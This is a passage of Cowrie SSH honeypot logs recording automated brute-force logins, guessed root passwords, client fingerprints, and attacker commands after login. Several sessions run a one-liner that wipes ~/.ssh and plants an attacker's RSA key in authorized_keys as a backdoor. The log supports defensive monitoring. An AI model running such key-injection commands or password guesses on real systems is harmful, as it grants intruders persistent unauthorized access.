,"arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:17:25.868292Z","src_ip":"212.227.235.229","session":"c758f13313aa"}
{"eventid":"cowrie.session.closed","duration":13.344092607498169,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:27.251016Z","src_ip":"187.85.2.216","session":"68a74219d2ab"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:17:28.211850Z","src_ip":"212.227.235.229","session":"c758f13313aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:17:28.650044Z","session":"c758f13313aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33098,"dst_ip":"1.2.3.4","dst_port":22,"session":"33e30b8e1808","protocol":"ssh","message":"New connection: 212.227.235.229:33098 (1.2.3.4:22) [session: 33e30b8e1808]","sensor":"my-vps","timestamp":"2025-08-26T04:17:29.089992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:17:29.092198Z","src_ip":"212.227.235.229","session":"33e30b8e1808"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:17:29.439514Z","src_ip":"212.227.235.229","session":"c758f13313aa"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:17:29.526865Z","src_ip":"212.227.235.229","session":"33e30b8e1808"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:31.078182Z","src_ip":"212.227.235.229","session":"c758f13313aa"}
{"eventid":"cowrie.login.failed","username":"proftpd","password":"proftpd","message":"login attempt [proftpd/proftpd] failed","sensor":"my-vps","timestamp":"2025-08-26T04:17:31.764701Z","src_ip":"212.227.235.229","session":"33e30b8e1808"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:33.093100Z","src_ip":"212.227.235.229","session":"33e30b8e1808"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59396,"dst_ip":"1.2.3.4","dst_port":22,"session":"644524685180","protocol":"ssh","message":"New connection: 212.227.235.229:59396 (1.2.3.4:22) [session: 644524685180]","sensor":"my-vps","timestamp":"2025-08-26T04:17:34.588959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:17:34.590019Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:17:34.873210Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.login.success","username":"root","password":"Cx123456.","message":"login attempt [root/Cx123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:17:36.048279Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:17:36.631650Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:17:36.677354Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:17:36.678816Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:36.963765Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:17:37.546780Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:17:37.547753Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:17:37.833153Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:37.834090Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42720,"dst_ip":"1.2.3.4","dst_port":22,"session":"0980f8ff3f4e","protocol":"ssh","message":"New connection: 212.227.235.229:42720 (1.2.3.4:22) [session: 0980f8ff3f4e]","sensor":"my-vps","timestamp":"2025-08-26T04:17:38.109936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:17:38.110624Z","src_ip":"212.227.235.229","session":"0980f8ff3f4e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:17:38.388243Z","src_ip":"212.227.235.229","session":"0980f8ff3f4e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:17:39.540556Z","src_ip":"212.227.235.229","session":"0980f8ff3f4e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:40.820772Z","src_ip":"212.227.235.229","session":"0980f8ff3f4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42734,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e408fa9c8d9","protocol":"ssh","message":"New connection: 212.227.235.229:42734 (1.2.3.4:22) [session: 9e408fa9c8d9]","sensor":"my-vps","timestamp":"2025-08-26T04:17:41.102784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:17:41.103879Z","src_ip":"212.227.235.229","session":"9e408fa9c8d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:17:41.383213Z","src_ip":"212.227.235.229","session":"9e408fa9c8d9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:17:42.545061Z","src_ip":"212.227.235.229","session":"9e408fa9c8d9"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:42.822380Z","src_ip":"212.227.235.229","session":"644524685180"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:42.826647Z","src_ip":"212.227.235.229","session":"9e408fa9c8d9"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":46834,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ebeadf05f6d","protocol":"ssh","message":"New connection: 68.183.87.241:46834 (1.2.3.4:22) [session: 3ebeadf05f6d]","sensor":"my-vps","timestamp":"2025-08-26T04:17:53.966562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:17:54.606523Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:17:54.876518Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":54912,"dst_ip":"1.2.3.4","dst_port":22,"session":"140e5b305540","protocol":"ssh","message":"New connection: 103.217.145.104:54912 (1.2.3.4:22) [session: 140e5b305540]","sensor":"my-vps","timestamp":"2025-08-26T04:17:56.353108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:17:56.353951Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:17:56.622417Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.login.success","username":"root","password":"Ws123456","message":"login attempt [root/Ws123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:17:57.008561Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:17:57.659882Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:17:57.660629Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:17:57.661342Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.login.success","username":"root","password":"qwert123456","message":"login attempt [root/qwert123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:17:57.736271Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:17:57.950732Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:17:58.293936Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:17:58.295005Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:17:58.296204Z","src_ip":"103.217.145.104","session":"140e5b305540"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:17:58.592463Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:17:58.593138Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
